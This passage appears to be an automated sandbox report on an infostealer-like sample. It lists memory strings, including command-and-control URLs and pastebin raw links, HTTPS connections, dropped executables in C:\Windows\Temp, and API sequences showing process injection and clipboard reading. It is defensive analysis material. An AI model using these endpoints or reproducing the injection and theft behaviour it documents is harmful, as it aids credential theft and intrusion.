Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/
Source: aspnet_regiis.exe, 0000001A.00000003.2023661770.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023545300.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023355458.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/((
Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/9
Source: aspnet_regiis.exe, 0000001A.00000003.2023097227.0000000004CED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2044772844.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023545300.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2044842096.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023218177.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023355458.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2069923934.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028F1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2068537398.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/api
Source: aspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/api7M
Source: aspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2123496041.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/apiV
Source: aspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/apibubM
Source: aspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/apis
Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/s
Source: aspnet_regiis.exe, 0000001A.00000003.2000438756.000000000296D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs:443/api
Source: powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1745042704.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005530000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000022.00000002.2296676818.00000000079F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000022.00000002.2258625366.0000000005EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005530000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.i
Source: powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000056B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005007000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: powershell.exe, 00000028.00000002.2374554287.0000000004C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/country
Source: powershell.exe, 00000026.00000002.2353438766.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryhZ_l
Source: powershell.exe, 00000024.00000002.2276629852.00000000034C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000056B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/iphZ_l
Source: powershell.exe, 00000008.00000002.1749981425.00000000060CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1779208319.000000000567B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1903260944.000000000607A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1924834507.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2287144047.00000000063E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2326060060.00000000065C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2411478791.0000000005894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000011.00000002.1887480681.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005369000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.00000000051AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005164000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000013.00000002.1892104681.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/NQfY14gm
Source: powershell.exe, 00000013.00000002.1895365190.0000000000860000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/nqfy14gm
Source: powershell.exe, 00000011.00000002.1885257880.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1930333354.0000000006BBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/rawNQfY14gm
Source: aspnet_regiis.exe, 0000001A.00000003.1953259118.0000000002926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://revirepart.biz/
Source: aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 0000001A.00000003.2023316255.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023048745.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D82000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: aspnet_regiis.exe, 0000001A.00000003.2023316255.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023048745.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D82000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.184.174:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49814 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 26_2_025D5300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

26_2_025D5300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 26_2_025D5300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

26_2_025D5300

System Summary

PE file contains section with special chars

Source: zbjnkzvo4cc.exe.17.dr	Static PE information: section name: m@ka
Source: mxtvcgq32fe.exe.19.dr	Static PE information: section name: m@ka

PE file has nameless sections

Source: zbjnkzvo4cc.exe.17.dr	Static PE information: section name:
Source: mxtvcgq32fe.exe.19.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\mxtvcgq32fe.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\zbjnkzvo4cc.exe			Jump to dropped file

Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68BF88C0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,NtGetContextThread,CloseHandle,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,CloseHandle,		24_2_68BF88C0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68BF6E40 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,		24_2_68BF6E40

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_047F246F	3_2_047F246F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F9B246F	3_2_6F9B246F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_036EB490	8_2_036EB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_036E2035	8_2_036E2035
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04EF246F	10_2_04EF246F
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68BF88C0	24_2_68BF88C0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68BF1210	24_2_68BF1210
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68BF6E40	24_2_68BF6E40
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68BFFCB0	24_2_68BFFCB0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68BF4810	24_2_68BF4810
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C0A621	24_2_68C0A621
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68BF7FE0	24_2_68BF7FE0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C4A4A0	24_2_68C4A4A0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C16CB0	24_2_68C16CB0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C39460	24_2_68C39460
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C17C70	24_2_68C17C70
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C19070	24_2_68C19070
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C309F0	24_2_68C309F0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C53980	24_2_68C53980
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C1B150	24_2_68C1B150
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C17160	24_2_68C17160
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C13970	24_2_68C13970
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C19EE0	24_2_68C19EE0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C4AEE0	24_2_68C4AEE0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C4A240	24_2_68C4A240
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C19250	24_2_68C19250
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C31650	24_2_68C31650
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C1D252	24_2_68C1D252
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C4D660	24_2_68C4D660
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C1EBD9	24_2_68C1EBD9
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C15FF0	24_2_68C15FF0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C53340	24_2_68C53340
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C32760	24_2_68C32760
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C4AB60	24_2_68C4AB60
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C12F70	24_2_68C12F70
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C4DB10	24_2_68C4DB10
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C4BFD0	24_2_68C4BFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025DD260	26_2_025DD260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A9AE0	26_2_025A9AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025DAAE0	26_2_025DAAE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025CF3ED	26_2_025CF3ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025CE398	26_2_025CE398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C9060	26_2_025C9060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C4860	26_2_025C4860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025B90D0	26_2_025B90D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C2110	26_2_025C2110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C6618	26_2_025C6618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025DA760	26_2_025DA760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025E2C40	26_2_025E2C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A8C70	26_2_025A8C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BA4DA	26_2_025BA4DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025AAD50	26_2_025AAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025E3580	26_2_025E3580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C1250	26_2_025C1250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C5A4A	26_2_025C5A4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025E3260	26_2_025E3260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A6200	26_2_025A6200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A4A31	26_2_025A4A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025DE2D0	26_2_025DE2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025DDAC0	26_2_025DDAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BE2F0	26_2_025BE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025D32F0	26_2_025D32F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025AB280	26_2_025AB280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025D8B4C	26_2_025D8B4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A2B70	26_2_025A2B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C2360	26_2_025C2360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BBB10	26_2_025BBB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BEFF5	26_2_025BEFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BFB20	26_2_025BFB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C6BD0	26_2_025C6BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A5BF0	26_2_025A5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BEBF0	26_2_025BEBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025D1BE8	26_2_025D1BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025E13A0	26_2_025E13A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A7870	26_2_025A7870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025E1860	26_2_025E1860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C3815	26_2_025C3815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025CA0D5	26_2_025CA0D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025CB0FA	26_2_025CB0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025D50F0	26_2_025D50F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BE0E8	26_2_025BE0E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A68B0	26_2_025A68B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025DB0A0	26_2_025DB0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025DA0A0	26_2_025DA0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025CC14A	26_2_025CC14A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025E1930	26_2_025E1930
